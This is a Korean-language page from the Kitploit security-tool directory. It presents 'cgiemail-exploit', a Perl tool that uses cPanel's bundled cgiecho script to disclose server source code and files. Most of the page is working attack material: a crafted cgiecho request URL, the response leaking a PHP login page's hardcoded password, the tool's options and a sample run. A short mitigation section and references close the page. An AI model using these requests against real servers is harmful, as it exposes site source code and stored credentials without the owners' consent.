Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/finbar-crago/cgiemail-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubfinbar-crago/cgiemail-exploit

cgiemail-exploit

Cgiemail - Source Code Disclosure/LFI

저장소 보기
1519년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Cgiemail - 소스 코드 노출/로컬 파일 포함 익스플로잇

cgiecho는 cgiemail에 포함된 스크립트로, 파일에 대괄호가 포함되어 있고 대괄호 안의 텍스트를 추측할 수 있다면 웹사이트 문서 루트 아래의 모든 파일을 반환합니다.

cgiemail은 현재 cPanel과 함께 제공되며 기본적으로 활성화되어 있습니다.

screen-shot

예제

페이지의 경우:

root@kitploit:~
<?php // http://hostname/login.php
if($_GET['user'] == 'admin' && $_GET['pass'] == 'thisissecure'){ /*...*/ }

요청:

root@kitploit:~
http://hostname/cgi-sys/cgiecho/login.php?'pass'=['pass']

반환:

root@kitploit:~
<HEAD><TITLE>Success</TITLE></HEAD>
<BODY>Processed form looks like this:<P><HR><PRE>
&lt;?php // http://hostname/login.php
if($_GET == 'admin' && $_GET['pass'] == 'thisissecure'){ /*..*/ }
</PRE><P>
<P><EM>cgiemail 
1.6
</EM></BODY>

cgiemail-exploit.pl

root@kitploit:~
Usage: ./cgiemail-exploit.pl [options] target

Options:
  --names         Check for names in commer separated list
  --num           Check for numbers
  --num-max       Maximum number to check (default 10)
  --php           Check PHP $_SERVER Variables
  --batch         Number of arguments sent per request (default 10)
  --cgiecho-path  Path of cgiecho on server (default '/cgi-sys/cgiecho/')
  --user-agent    Set user-agent (default 'Mozilla/5.0')
  --deley         Pause between requests in seconds (default 1)
  --timeout       Set connection timeout (default 10)

예제

root@kitploit:~
$ ./cgiemail-exploit.pl --num --names 'email,password' http://hostname/login.php > login.php
detected cgiemail 1.6
request 1 of 2...
success!
url: http://hostname//cgi-sys/cgiecho/login.php?0=[0]&1=[1]&2=[2]&3=[3]&4=[4]&5=[5]&6=[6]&7=[7]&8=[8]&9=[9]&

주의사항

  • 변수에 값이 제공되지 않으면 해당 변수는 제외되므로, '$_POST/$_GET' 변수 중 []가 누락된 변수가 나타날 수 있습니다...

해결 방법

  • cgiemail을 사용하지 마십시오...
  • cgiemail을 비활성화하십시오...
  • 어떤 이유로든 cgiemail이 설치된 시스템을 사용해야 한다면, 변수의 최대 길이는 255이며 대괄호 안에 긴 문자열을 넣으면 오류가 반환됩니다.
  • 대괄호를 사용하지 않으면?

참고

  • http://web.mit.edu/wwwdev/cgiemail/webmaster.html#security
  • https://documentation.cpanel.net/display/1144Docs/Tweak+Settings+-+Security#TweakSettings-Security-CGIEmailandCGIEcho
도구 다운로드